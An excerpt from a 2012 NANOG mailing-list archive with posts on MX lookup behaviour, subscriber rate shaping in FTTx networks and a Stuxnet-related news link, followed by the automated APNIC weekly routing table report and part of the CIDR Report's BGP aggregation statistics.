<20120727024538.46BAF23125D1@drugs.dv.isc.org> Message-ID: On Thu, Jul 26, 2012 at 7:45 PM, Mark Andrews wrote: > You don't lookup MX records for MX targets. This is basic MTA > processing. > > If the MX lookup fails, as apposed to returns nodata, you don't > lookup the A/AAAA records and synthesis a MX record. You treat it > as a soft error and queue for retry later. Again this is basic MTA > processing. > And yet, Hotmail apparently is doing the exact opposite of that. Which means what 'should' happen or what 'should' be done isn't as relevant as we would all it to be. Given this, considering "unusual" things like the target of an MX record having an MX record it - whilst completely irrelevant for a well-behaved mail server - might actually be relevant here... Scott. From jeff-kell at utc.edu Fri Jul 27 07:01:45 2012 From: jeff-kell at utc.edu (Jeff Kell) Date: Fri, 27 Jul 2012 08:01:45 -0400 Subject: Rate shaping in Active E FTTx networks In-Reply-To: <50120931.4050408@buh.org> References: <50120931.4050408@buh.org> Message-ID: <50128329.9080501@utc.edu> On 7/26/2012 11:21 PM, Erik Muller wrote: > I've seen a few deployments using Packeteer's (now BlueCoat) > PacketShaper for this purpose; the only downside I've heard with that > platform is cost. Sandvine and Fortinet are a couple other options > that have different approaches, but have a lot of this functionality > rolled in alongside their broader security services. For shaping flexibility and real DPI, Procera PacketLogic is an order of magnitude (and throughput) beyond Packeteer (speaking as a current user of the former and a former user of the latter). I know their higher-ed distribution is substantial (for those that shape by policy). There are other "fair game" shaping appliances (NetEqualizer) if you just want to give everyone equal access to whatever bandwidth remains. But for real application inspection, the traditional players (Packeteer, Allot, etc) today just tell you that yes, 80-90% of your traffic is HTTP protocol, now what? Jeff From jared at puck.nether.net Fri Jul 27 07:16:10 2012 From: jared at puck.nether.net (Jared Mauch) Date: Fri, 27 Jul 2012 08:16:10 -0400 Subject: Rate shaping in Active E FTTx networks In-Reply-To: References: Message-ID: <6801FA53-6DF9-4BDA-B958-9AEEA12E74EA@puck.nether.net> Many CPE platforms have the rate limit built in. Some (eg: Zhone) do this in 1mbps increments. Ideally there would be some greater level of granularity but it seems to work. You can obviously police on the other end as well if required. Jared Mauch On Jul 26, 2012, at 3:45 PM, Jason Lixfeld wrote: > So in terms of PIR for Internet access, is there some magic box that sits between the various subscriber aggregation points and the core, which takes care of shaping the subscriber's Internet access PIR, while making sure that the any preferential treatment of interactive services is performed. From bedard.phil at gmail.com Fri Jul 27 07:49:05 2012 From: bedard.phil at gmail.com (Phil) Date: Fri, 27 Jul 2012 08:49:05 -0400 Subject: Rate shaping in Active E FTTx networks In-Reply-To: References: Message-ID: On the downstream end the limiting is usually done on the subscriber aggregation equipment. Router vendors sell linecards with large amounts of queue capability for this reason. This is where you would introduce some kind of QoS to deal with video or voice as well. Upstream could be done the same way if they have true direct connections to the gear or be done on a CPE. As far as differentiating traffic within an Internet pipe that is a slippery legal slope. Others have mentioned the bigger players like Procera and Sandvine. Phil On Jul 26, 2012, at 3:45 PM, Jason Lixfeld wrote: > Hi all, > > I'm trying to gauge what operators are doing to handle per-subscriber Internet access PIR bandwidth in Active E FTTx networks. > > I presume operators would want to limit the each subscriber to a certain PIR, but within that limit, do things like perform preferential treatment of interactive services like steaming video or Skype, etc., ahead of non-interactive services like FTP. > > My impression is that a subscriber's physical access in these networks is exponentially larger than their allocated amount of Internet access. This would leave ample room on the physical access access for other services like Voice and IPTV that might run on separate VLANs than the Internet access VLAN. That said, I doubt there's really that much of a concern about allocating PIR on these other service VLANs. > > So in terms of PIR for Internet access, is there some magic box that sits between the various subscriber aggregation points and the core, which takes care of shaping the subscriber's Internet access PIR, while making sure that the any preferential treatment of interactive services is performed. > > Is that a lot to ask for one box? The ridiculously deep buffers required in order to shape to PIR vs. police to it (because policing to a PIR is just plain ugly) and the requirements to perform any sort of preferential packet treatment above and beyond that seem like quite a lot to ask of one box. Am I wrong? > > Who might make a box like this, if it exists? And if not, what are folks using the achieve these results? > > Thanks in advance for any insights.. From mail at danrl.de Fri Jul 27 09:02:25 2012 From: mail at danrl.de (Dan Luedtke) Date: Fri, 27 Jul 2012 16:02:25 +0200 Subject: Stuxnet and more In-Reply-To: <000601cd6bad$7130cbf0$539263d0$@infratection.com> References: <000601cd6bad$7130cbf0$539263d0$@infratection.com> Message-ID: <1343397745.29320.16.camel@localhost> http://www.f-secure.com/weblog/archives/00002403.html > There was also some music playing randomly on several of the > workstations during the middle of the night with the volume maxed > out. I believe it was playing 'Thunderstruck' by AC/DC. Someone "orchestratesd an attack", hmm? Nice. -- Dan Luedtke http://www.danrl.de From mpetach at netflight.com Fri Jul 27 11:14:46 2012 From: mpetach at netflight.com (Matthew Petach) Date: Fri, 27 Jul 2012 09:14:46 -0700 Subject: [routing-wg] The Cidr Report In-Reply-To: References: <201110142200.p9EM00ua002638@wattle.apnic.net> Message-ID: On Sat, Oct 15, 2011 at 12:25 PM, Geoff Huston wrote: > Perhaps we should have newnog implement a penalty payment system for registrations; tag an extra $25 "excessive leakage" charge onto conference registrations for networks that are in the top 30 list? I worked at a network that made it onto the list of shame. Once. It was projected onto the screen at NANOG 8 during a presentation. I don't even remember the rest of the presentation, because all of us present from that network immediately ssh'd in, figured out the missing route-map on a session, applied it, and looked around very red-facedly at everyone else in the room. anonymous shaming on a mailing list is one thing. public shaming in a room full of your peers...that hits home immediately and viscerally, if you have any pride as an engineer. ^_^;; Don't stop what you're doing, Geoff--it does make a difference. Matt From surfer at mauigateway.com Fri Jul 27 13:12:26 2012 From: surfer at mauigateway.com (Scott Weeks) Date: Fri, 27 Jul 2012 11:12:26 -0700 Subject: Stuxnet and more Message-ID: <20120727111226.BA86C8E7@resin09.mta.everyone.net> --- rgolodner at infratection.com wrote: From: "Richard Golodner" Grant and the rest of you NANOGERS, more regarding new problems in Iran via an F-Secure blog. Here is the link: http://www.f-secure.com/weblog/archives/00002403.html ------------------------------------------------ If you connect those kind of networks to machines connected to the internet you gets what you pays for... scott From cscora at apnic.net Fri Jul 27 14:10:37 2012 From: cscora at apnic.net (Routing Analysis Role Account) Date: Sat, 28 Jul 2012 05:10:37 +1000 (EST) Subject: Weekly Routing Table Report Message-ID: <201207271910.q6RJAg8w017939@thyme.rand.apnic.net> This is an automated weekly mailing describing the state of the Internet Routing Table as seen from APNIC's router in Japan. The posting is sent to APOPS, NANOG, AfNOG, AusNOG, SANOG, PacNOG, LacNOG, TRNOG, CaribNOG and the RIPE Routing Working Group. Daily listings are sent to bgp-stats at lists.apnic.net For historical data, please see http://thyme.rand.apnic.net. If you have any comments please contact Philip Smith . Routing Table Report 04:00 +10GMT Sat 28 Jul, 2012 Report Website: http://thyme.rand.apnic.net Detailed Analysis: http://thyme.rand.apnic.net/current/ Analysis Summary ---------------- BGP routing table entries examined: 419174 Prefixes after maximum aggregation: 176627 Deaggregation factor: 2.37 Unique aggregates announced to Internet: 204455 Total ASes present in the Internet Routing Table: 41639 Prefixes per ASN: 10.07 Origin-only ASes present in the Internet Routing Table: 33374 Origin ASes announcing only one prefix: 15702 Transit ASes present in the Internet Routing Table: 5601 Transit-only ASes present in the Internet Routing Table: 136 Average AS path length visible in the Internet Routing Table: 4.6 Max AS path length visible: 32 Max AS path prepend of ASN ( 48687) 24 Prefixes from unregistered ASNs in the Routing Table: 382 Unregistered ASNs in the Routing Table: 146 Number of 32-bit ASNs allocated by the RIRs: 3041 Number of 32-bit ASNs visible in the Routing Table: 2664 Prefixes from 32-bit ASNs in the Routing Table: 6906 Special use prefixes present in the Routing Table: 1 Prefixes being announced from unallocated address space: 170 Number of addresses announced to Internet: 2582312876 Equivalent to 153 /8s, 234 /16s and 247 /24s Percentage of available address space announced: 69.7 Percentage of allocated address space announced: 69.7 Percentage of available address space allocated: 99.9 Percentage of address space in use by end-sites: 93.1 Total number of prefixes smaller than registry allocations: 146088 APNIC Region Analysis Summary ----------------------------- Prefixes being announced by APNIC Region ASes: 102575 Total APNIC prefixes after maximum aggregation: 32799 APNIC Deaggregation factor: 3.13 Prefixes being announced from the APNIC address blocks: 103070 Unique aggregates announced from the APNIC address blocks: 42296 APNIC Region origin ASes present in the Internet Routing Table: 4721 APNIC Prefixes per ASN: 21.83 APNIC Region origin ASes announcing only one prefix: 1238 APNIC Region transit ASes present in the Internet Routing Table: 754 Average APNIC Region AS path length visible: 4.6 Max APNIC Region AS path length visible: 26 Number of APNIC region 32-bit ASNs visible in the Routing Table: 259 Number of APNIC addresses announced to Internet: 705852800 Equivalent to 42 /8s, 18 /16s and 117 /24s Percentage of available APNIC address space announced: 82.5 APNIC AS Blocks 4608-4864, 7467-7722, 9216-10239, 17408-18431 (pre-ERX allocations) 23552-24575, 37888-38911, 45056-46079, 55296-56319, 58368-59391, 131072-133119 APNIC Address Blocks 1/8, 14/8, 27/8, 36/8, 39/8, 42/8, 43/8, 49/8, 58/8, 59/8, 60/8, 61/8, 101/8, 103/8, 106/8, 110/8, 111/8, 112/8, 113/8, 114/8, 115/8, 116/8, 117/8, 118/8, 119/8, 120/8, 121/8, 122/8, 123/8, 124/8, 125/8, 126/8, 133/8, 150/8, 153/8, 163/8, 171/8, 175/8, 180/8, 182/8, 183/8, 202/8, 203/8, 210/8, 211/8, 218/8, 219/8, 220/8, 221/8, 222/8, 223/8, ARIN Region Analysis Summary ---------------------------- Prefixes being announced by ARIN Region ASes: 153020 Total ARIN prefixes after maximum aggregation: 77710 ARIN Deaggregation factor: 1.97 Prefixes being announced from the ARIN address blocks: 154089 Unique aggregates announced from the ARIN address blocks: 68810 ARIN Region origin ASes present in the Internet Routing Table: 15208 ARIN Prefixes per ASN: 10.13 ARIN Region origin ASes announcing only one prefix: 5776 ARIN Region transit ASes present in the Internet Routing Table: 1608 Average ARIN Region AS path length visible: 4.1 Max ARIN Region AS path length visible: 24 Number of ARIN region 32-bit ASNs visible in the Routing Table: 16 Number of ARIN addresses announced to Internet: 1083040640 Equivalent to 64 /8s, 141 /16s and 227 /24s Percentage of available ARIN address space announced: 57.3 ARIN AS Blocks 1-1876, 1902-2042, 2044-2046, 2048-2106 (pre-ERX allocations) 2138-2584, 2615-2772, 2823-2829, 2880-3153 3354-4607, 4865-5119, 5632-6655, 6912-7466 7723-8191, 10240-12287, 13312-15359, 16384-17407 18432-20479, 21504-23551, 25600-26591, 26624-27647, 29696-30719, 31744-33791 35840-36863, 39936-40959, 46080-47103 53248-55295, 393216-394239 ARIN Address Blocks 3/8, 4/8, 6/8, 7/8, 8/8, 9/8, 11/8, 12/8, 13/8, 15/8, 16/8, 17/8, 18/8, 19/8, 20/8, 21/8, 22/8, 23/8, 24/8, 26/8, 28/8, 29/8, 30/8, 32/8, 33/8, 34/8, 35/8, 38/8, 40/8, 44/8, 45/8, 47/8, 48/8, 50/8, 52/8, 53/8, 54/8, 55/8, 56/8, 57/8, 63/8, 64/8, 65/8, 66/8, 67/8, 68/8, 69/8, 70/8, 71/8, 72/8, 73/8, 74/8, 75/8, 76/8, 96/8, 97/8, 98/8, 99/8, 100/8, 104/8, 107/8, 108/8, 128/8, 129/8, 130/8, 131/8, 132/8, 134/8, 135/8, 136/8, 137/8, 138/8, 139/8, 140/8, 142/8, 143/8, 144/8, 146/8, 147/8, 148/8, 149/8, 152/8, 155/8, 156/8, 157/8, 158/8, 159/8, 160/8, 161/8, 162/8, 164/8, 165/8, 166/8, 167/8, 168/8, 169/8, 170/8, 172/8, 173/8, 174/8, 184/8, 192/8, 198/8, 199/8, 204/8, 205/8, 206/8, 207/8, 208/8, 209/8, 214/8, 215/8, 216/8, RIPE Region Analysis Summary ---------------------------- Prefixes being announced by RIPE Region ASes: 104106 Total RIPE prefixes after maximum aggregation: 55508 RIPE Deaggregation factor: 1.88 Prefixes being announced from the RIPE address blocks: 106284 Unique aggregates announced from the RIPE address blocks: 67918 RIPE Region origin ASes present in the Internet Routing Table: 16711 RIPE Prefixes per ASN: 6.36 RIPE Region origin ASes announcing only one prefix: 8098 RIPE Region transit ASes present in the Internet Routing Table: 2716 Average RIPE Region AS path length visible: 5.1 Max RIPE Region AS path length visible: 32 Number of RIPE region 32-bit ASNs visible in the Routing Table: 1746 Number of RIPE addresses announced to Internet: 637676548 Equivalent to 38 /8s, 2 /16s and 44 /24s Percentage of available RIPE address space announced: 92.7 RIPE AS Blocks 1877-1901, 2043, 2047, 2107-2136, 2585-2614 (pre-ERX allocations) 2773-2822, 2830-2879, 3154-3353, 5377-5631 6656-6911, 8192-9215, 12288-13311, 15360-16383 20480-21503, 24576-25599, 28672-29695 30720-31743, 33792-35839, 38912-39935 40960-45055, 47104-52223, 56320-58367 59392-61439, 196608-199679 RIPE Address Blocks 2/8, 5/8, 25/8, 31/8, 37/8, 46/8, 51/8, 62/8, 77/8, 78/8, 79/8, 80/8, 81/8, 82/8, 83/8, 84/8, 85/8, 86/8, 87/8, 88/8, 89/8, 90/8, 91/8, 92/8, 93/8, 94/8, 95/8, 109/8, 141/8, 145/8, 151/8, 176/8, 178/8, 185/8, 188/8, 193/8, 194/8, 195/8, 212/8, 213/8, 217/8, LACNIC Region Analysis Summary ------------------------------ Prefixes being announced by LACNIC Region ASes: 42912 Total LACNIC prefixes after maximum aggregation: 8381 LACNIC Deaggregation factor: 5.12 Prefixes being announced from the LACNIC address blocks: 45634 Unique aggregates announced from the LACNIC address blocks: 21883 LACNIC Region origin ASes present in the Internet Routing Table: 1616 LACNIC Prefixes per ASN: 28.24 LACNIC Region origin ASes announcing only one prefix: 424 LACNIC Region transit ASes present in the Internet Routing Table: 313 Average LACNIC Region AS path length visible: 4.8 Max LACNIC Region AS path length visible: 25 Number of LACNIC region 32-bit ASNs visible in the Routing Table: 637 Number of LACNIC addresses announced to Internet: 113013416 Equivalent to 6 /8s, 188 /16s and 114 /24s Percentage of available LACNIC address space announced: 67.4 LACNIC AS Blocks 26592-26623, 27648-28671, 52224-53247, 262144-263167 plus ERX transfers LACNIC Address Blocks 177/8, 179/8, 181/8, 186/8, 187/8, 189/8, 190/8, 191/8, 200/8, 201/8, AfriNIC Region Analysis Summary ------------------------------- Prefixes being announced by AfriNIC Region ASes: 9495 Total AfriNIC prefixes after maximum aggregation: 2175 AfriNIC Deaggregation factor: 4.37 Prefixes being announced from the AfriNIC address blocks: 9927 Unique aggregates announced from the AfriNIC address blocks: 3399 AfriNIC Region origin ASes present in the Internet Routing Table: 550 AfriNIC Prefixes per ASN: 18.05 AfriNIC Region origin ASes announcing only one prefix: 166 AfriNIC Region transit ASes present in the Internet Routing Table: 120 Average AfriNIC Region AS path length visible: 4.4 Max AfriNIC Region AS path length visible: 25 Number of AfriNIC region 32-bit ASNs visible in the Routing Table: 6 Number of AfriNIC addresses announced to Internet: 41353984 Equivalent to 2 /8s, 119 /16s and 3 /24s Percentage of available AfriNIC address space announced: 41.1 AfriNIC AS Blocks 36864-37887, 327680-328703 & ERX transfers AfriNIC Address Blocks 41/8, 102/8, 105/8, 154/8, 196/8, 197/8, APNIC Region per AS prefix count summary ---------------------------------------- ASN No of nets /20 equiv MaxAgg Description 4766 2759 11123 1252 Korea Telecom (KIX) 17974 2274 569 90 PT TELEKOMUNIKASI INDONESIA 7545 1703 301 86 TPG Internet Pty Ltd 4755 1614 388 163 TATA Communications formerly 9829 1306 1085 26 BSNL National Internet Backbo 9583 1160 87 508 Sify Limited 7552 1128 1062 11 Vietel Corporation 4808 1117 2052 317 CNCGROUP IP network: China169 24560 1038 385 165 Bharti Airtel Ltd., Telemedia 9498 991 294 73 BHARTI Airtel Ltd. Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-APNIC ARIN Region per AS prefix count summary --------------------------------------- ASN No of nets /20 equiv MaxAgg Description 7029 3412 986 155 Windstream Communications Inc 6389 3383 3773 186 bellsouth.net, inc. 18566 2088 382 181 Covad Communications 1785 1939 681 130 PaeTec Communications, Inc. 22773 1698 2914 125 Cox Communications, Inc. 20115 1647 1570 611 Charter Communications 4323 1575 1028 383 Time Warner Telecom 30036 1404 274 788 Mediacom Communications Corp 7018 1255 10040 822 AT&T WorldNet Services 11492 1192 217 350 Cable One Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-ARIN RIPE Region per AS prefix count summary --------------------------------------- ASN No of nets /20 equiv MaxAgg Description 8402 1595 544 16 Corbina telecom 12479 808 749 92 Uni2 Autonomous System 34984 735 189 177 BILISIM TELEKOM 6830 715 2310 446 UPC Distribution Services 20940 707 228 554 Akamai Technologies European 31148 706 37 9 FreeNet ISP 2118 632 97 14 EUnet/RELCOM Autonomous Syste 13188 613 100 9 Educational Network 8551 579 364 61 Bezeq International 3320 502 8443 411 Deutsche Telekom AG Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-RIPE LACNIC Region per AS prefix count summary ----------------------------------------- ASN No of nets /20 equiv MaxAgg Description 28573 2044 1226 58 NET Servicos de Comunicao S.A 10620 2030 349 213 TVCABLE BOGOTA 6503 1527 419 67 AVANTEL, S.A. 8151 1470 3069 350 UniNet S.A. de C.V. 7303 1458 934 196 Telecom Argentina Stet-France 6458 882 81 15 GUATEL 27947 719 74 95 Telconet S.A 11172 644 91 75 Servicios Alestra S.A de C.V 3816 597 250 84 Empresa Nacional de Telecomun 22047 583 326 15 VTR PUNTO NET S.A. Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-LACNIC AfriNIC Region per AS prefix count summary ------------------------------------------ ASN No of nets /20 equiv MaxAgg Description 8452 1030 958 13 TEDATA 24863 859 274 32 LINKdotNET AS number 6713 509 650 19 Itissalat Al-MAGHRIB 36998 483 48 3 MOBITEL 24835 286 80 8 RAYA Telecom - Egypt 3741 262 905 223 The Internet Solution 12258 197 28 62 Vodacom Internet Company 29975 191 667 21 Vodacom 16637 170 680 87 MTN Network Solutions 15706 160 32 6 Sudatel Internet Exchange Aut Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-AFRINIC Global Per AS prefix count summary ---------------------------------- ASN No of nets /20 equiv MaxAgg Description 7029 3412 986 155 Windstream Communications Inc 6389 3383 3773 186 bellsouth.net, inc. 4766 2759 11123 1252 Korea Telecom (KIX) 17974 2274 569 90 PT TELEKOMUNIKASI INDONESIA 18566 2088 382 181 Covad Communications 28573 2044 1226 58 NET Servicos de Comunicao S.A 10620 2030 349 213 TVCABLE BOGOTA 1785 1939 681 130 PaeTec Communications, Inc. 7545 1703 301 86 TPG Internet Pty Ltd 22773 1698 2914 125 Cox Communications, Inc. Complete listing at http://thyme.rand.apnic.net/current/data-ASnet Global Per AS Maximum Aggr summary ---------------------------------- ASN No of nets Net Savings Description 6389 3383 3197 bellsouth.net, inc. 17974 2274 2184 PT TELEKOMUNIKASI INDONESIA 28573 2044 1986 NET Servicos de Comunicao S.A 18566 2088 1907 Covad Communications 10620 2030 1817 TVCABLE BOGOTA 1785 1939 1809 PaeTec Communications, Inc. 7545 1703 1617 TPG Internet Pty Ltd 8402 1595 1579 Corbina telecom 22773 1698 1573 Cox Communications, Inc. 4766 2759 1507 Korea Telecom (KIX) Complete listing at http://thyme.rand.apnic.net/current/data-CIDRnet List of Unregistered Origin ASNs (Global) ----------------------------------------- Bad AS Designation Network Transit AS Description 59407 UNALLOCATED 5.134.16.0/21 51167 Giga-Hosting GmbH 59457 UNALLOCATED 5.149.64.0/24 35567 DASTO semtel d.o.o. 59457 UNALLOCATED 5.149.64.0/19 35567 DASTO semtel d.o.o. 59457 UNALLOCATED 5.149.65.0/24 35567 DASTO semtel d.o.o. 59457 UNALLOCATED 5.149.66.0/24 35567 DASTO semtel d.o.o. 59473 UNALLOCATED 5.149.152.0/22 44843 AmsterdamTelecom Ltd 59473 UNALLOCATED 5.149.156.0/23 44843 AmsterdamTelecom Ltd 15132 UNALLOCATED 12.9.150.0/24 7018 AT&T WorldNet Servic 25639 UNALLOCATED 12.41.169.0/24 7018 AT&T WorldNet Servic 13317 UNALLOCATED 12.44.10.0/24 7018 AT&T WorldNet Servic Complete listing at http://thyme.rand.apnic.net/current/data-badAS Prefixes from private and non-routed address space (Global) ----------------------------------------------------------- Prefix Origin AS Description 198.18.0.0/15 14744 Internap Network Services Complete listing at http://thyme.rand.apnic.net/current/data-dsua Advertised Unallocated Addresses -------------------------------- Network Origin AS Description 5.10.8.0/21 57154 Stadtwerke Konstanz GmbH 5.10.40.0/21 12466 BICOS.NET Autonomous System 5.10.48.0/20 29562 Kabel Baden-Wuerttemberg GmbH 5.158.96.0/19 38934 Pride Limited 5.158.200.0/21 23456 32-bit ASN transition 5.158.208.0/21 2914 Verio, Inc. 5.159.40.0/21 23456 32-bit ASN transition 14.192.0.0/22 45464 Room 201, TGU Bldg 14.192.4.0/22 45464 Room 201, TGU Bldg 14.192.8.0/22 45464 Room 201, TGU Bldg Complete listing at http://thyme.rand.apnic.net/current/data-add-IANA Number of prefixes announced per prefix length (Global) ------------------------------------------------------- /1:0 /2:0 /3:0 /4:0 /5:0 /6:0 /7:0 /8:19 /9:13 /10:28 /11:83 /12:236 /13:475 /14:848 /15:1529 /16:12304 /17:6362 /18:10763 /19:20931 /20:29897 /21:31764 /22:41424 /23:39675 /24:219022 /25:1215 /26:1472 /27:850 /28:162 /29:60 /30:18 /31:0 /32:24 Advertised prefixes smaller than registry allocations ----------------------------------------------------- ASN No of nets Total ann. Description 7029 2773 3412 Windstream Communications Inc 18566 2038 2088 Covad Communications 6389 1864 3383 bellsouth.net, inc. 30036 1339 1404 Mediacom Communications Corp 8402 1292 1595 Corbina telecom 11492 1155 1192 Cable One 22773 1122 1698 Cox Communications, Inc. 6503 1051 1527 AVANTEL, S.A. 1785 1048 1939 PaeTec Communications, Inc. 7011 930 1191 Citizens Utilities Complete listing at http://thyme.rand.apnic.net/current/data-sXXas-nos Number of /24s announced per /8 block (Global) ---------------------------------------------- 1:564 2:688 3:1 4:13 5:239 6:3 8:440 12:2008 13:1 14:635 15:11 16:3 17:6 20:24 23:202 24:1796 27:1320 31:1018 32:56 33:2 34:2 36:8 37:672 38:824 39:1 40:134 41:2848 42:158 44:3 46:1551 47:2 49:429 50:569 52:13 54:14 55:8 56:1 57:31 58:983 59:532 60:237 61:1359 62:928 63:2029 64:4241 65:2241 66:4513 67:2021 68:1155 69:3201 70:986 71:520 72:1870 74:2604 75:489 76:335 77:938 78:938 79:492 80:1233 81:948 82:642 83:539 84:511 85:1161 86:451 87:931 88:346 89:1764 90:303 91:5063 92:585 93:1307 94:1564 95:1236 96:401 97:318 98:887 99:39 100:21 101:258 103:1324 105:464 106:115 107:189 108:404 109:1464 110:793 111:943 112:431 113:681 114:667 115:925 116:924 117:737 118:922 119:1236 120:357 121:806 122:1667 123:1156 124:1380 125:1259 128:556 129:185 130:266 131:638 132:298 133:22 134:245 135:61 136:215 137:240 138:342 139:184 140:495 141:254 142:437 143:370 144:496 145:77 146:509 147:288 148:767 149:319 150:153 151:186 152:473 153:176 154:19 155:402 156:222 157:382 158:190 159:626 160:344 161:280 162:383 163:189 164:674 165:412 166:585 167:535 168:956 169:127 170:899 171:147 172:5 173:1736 174:605 175:435 176:574 177:998 178:1652 180:1327 181:113 182:1044 183:207 184:559 186:2044 187:1094 188:1379 189:1584 190:6148 192:6021 193:5431 194:4192 195:3207 196:1207 197:184 198:3682 199:4936 200:5994 201:1980 202:8727 203:8671 204:4392 205:2531 206:2794 207:2831 208:4052 209:3632 210:2771 211:1565 212:2042 213:1801 214:875 215:86 216:5073 217:1565 218:562 219:338 220:1233 221:572 222:335 223:350 End of report From cidr-report at potaroo.net Fri Jul 27 17:00:00 2012 From: cidr-report at potaroo.net (cidr-report at potaroo.net) Date: Fri, 27 Jul 2012 22:00:00 GMT Subject: The Cidr Report Message-ID: <201207272200.q6RM00bc071680@wattle.apnic.net> This report has been generated at Fri Jul 27 21:13:00 2012 AEST. The report analyses the BGP Routing Table of AS2.0 router and generates a report on aggregation potential within the table. Check http://www.cidr-report.org for a current version of this report. Recent Table History Date Prefixes CIDR Agg 20-07-12 419152 241935 21-07-12 420802 243450 22-07-12 420851 242316 23-07-12 420929 242400 24-07-12 420469 242764 25-07-12 420742 242807 26-07-12 420845 243201 27-07-12 421258 243595 AS Summary 41762 Number of ASes in routing system 17448 Number of ASes announcing only one prefix 3413 Largest number of prefixes announced by an AS AS7029 : WINDSTREAM - Windstream Communications Inc 114212832 Largest address span announced by an AS (/32s) AS4134 : CHINANET-BACKBONE No.31,Jin-rong Street Aggregation Summary The algorithm used in this report proposes aggregation only when there is a precise match using the AS path, so as to preserve traffic transit policies. Aggregation is also proposed across non-advertised address space ('holes'). --- 27Jul12 --- ASnum NetsNow NetsAggr NetGain % Gain Description Table 421768 243593 178175 42.2% All ASes AS6389 3382 194 3188 94.3% BELLSOUTH-NET-BLK - BellSouth.net Inc. AS17974 2274 459 1815 79.8% TELKOMNET-AS2-AP PT Telekomunikasi Indonesia AS7029 3413 1737 1676 49.1% WINDSTREAM - Windstream Communications Inc AS18566 2088 417 1671 80.0% COVAD - Covad Communications Co. AS28573 2044 472 1572 76.9% NET Servicos de Comunicao S.A. AS4766 2764 1295 1469 53.1% KIXS-AS-KR Korea Telecom AS10620 2030 606 1424 70.1% Telmex Colombia S.A. AS4323 1577 387 1190 75.5% TWTC - tw telecom holdings, inc. AS22773 1698 570 1128 66.4% ASN-CXA-ALL-CCI-22773-RDC - Cox Communications Inc. AS1785 1940 816 1124 57.9% AS-PAETEC-NET - PaeTec Communications, Inc. AS4755 1613 576 1037 64.3% TATACOMM-AS TATA Communications formerly VSNL is Leading ISP AS7303 1458 451 1007 69.1% Telecom Argentina S.A. AS7552 1128 226 902 80.0% VIETEL-AS-AP Vietel Corporation AS6458 881 45 836 94.9% Telgua AS8151 1473 668 805 54.7% Uninet S.A. de C.V. AS18101 942 157 785 83.3% RELIANCE-COMMUNICATIONS-IN Reliance Communications Ltd.DAKC MUMBAI AS17908 828 60 768 92.8% TCISL Tata Communications AS4808 1117 350 767 68.7% CHINA169-BJ CNCGROUP IP network China169 Beijing Province Network AS9394 908 166 742 81.7% CRNET CHINA RAILWAY Internet(CRNET) AS13977 839 123 716 85.3% CTELCO - FAIRPOINT COMMUNICATIONS, INC. AS855 694 52 642 92.5% CANET-ASN-4 - Bell Aliant Regional Communications, Inc. AS3356 1105 473 632 57.2% LEVEL3 Level 3 Communications AS17676 695 75 620 89.2% GIGAINFRA Softbank BB Corp. AS2118 632 14 618 97.8% RELCOM-AS OOO "NPO Relcom" AS22561 1035 424 611 59.0% DIGITAL-TELEPORT - Digital Teleport Inc. AS19262 1001 403 598 59.7% VZGNI-TRANSIT - Verizon Online LLC AS4780 834 243 591 70.9% SEEDNET Digital United Inc. AS24560 1038 449 589 56.7% AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services AS3549 1000 437 563 56.3% GBLX Global Crossing Ltd. AS4804 653 96 557 85.3% MPX-AS Microplex PTY LTD Total 43084 12441 30643 71.1% Top 30 total Possible Bogus Routes 5.159.40.0/21 AS19682 NETWORKRECOVERY Business Recovery Services Limited 10.86.64.32/30 AS65530 -Private Use AS- 10.86.64.36/30 AS65530 -Private Use AS- 10.86.65.32/30 AS65530 -Private Use AS- 10.86.65.36/30 AS65530 -Private Use AS- 10.255.255.0/30 AS65530 -Private Use AS- 10.255.255.4/30 AS65530 -Private Use AS- 10.255.255.8/30 AS65530 -Private Use AS- 14.192.0.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.4.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.8.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.12.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.16.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.20.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.24.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.28.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 27.112.114.0/24 AS23884 PROENNET-AS Proimage Engineering and Communication Co.,Ltd. 41.222.80.0/21 AS37110 moztel-as 41.223.108.0/22 AS36966 EDL_AS Edgenet AS 62.61.220.0/24 AS24974 TACHYON-EU Tachyon Europe BV 62.61.221.0/24 AS24974 TACHYON-EU Tachyon Europe BV 64.66.32.0/20 AS18864 66.171.32.0/20 AS705 UUNET - MCI Communications Services, Inc. d/b/a Verizon Business 66.180.239.0/24 AS35888 VIGNETTE - VIGNETTE CORPORATION 66.207.32.0/20 AS23011 66.245.176.0/20 AS19318 NJIIX-AS-1 - NEW JERSEY INTERNATIONAL INTERNET EXCHANGE LLC 66.251.128.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.133.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.134.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.136.0/21 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.140.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.141.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.142.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.143.0/24 AS3356 LEVEL3 Level 3 Communications 69.46.224.0/20 AS32592 HUNT-BROTHERS-OF-LOUISIANA-LLC - Hunt Brothers 69.46.233.0/24 AS32592 HUNT-BROTHERS-OF-LOUISIANA-LLC - Hunt Brothers 69.46.236.0/24 AS32592 HUNT-BROTHERS-OF-LOUISIANA-LLC - Hunt Brothers 70.34.112.0/20 AS27589 MOJOHOST - MOJOHOST 71.19.134.0/23 AS3313 INET-AS BT Italia S.p.A. 72.35.224.0/22 AS30097 NUWAVE - NuWave 72.35.229.0/24 AS30188 TELEVERGENCE - Televergence Solutions Inc. 72.35.232.0/21 AS30097 NUWAVE - NuWave 72.44.16.0/20 AS15054 HAMELTRONICS 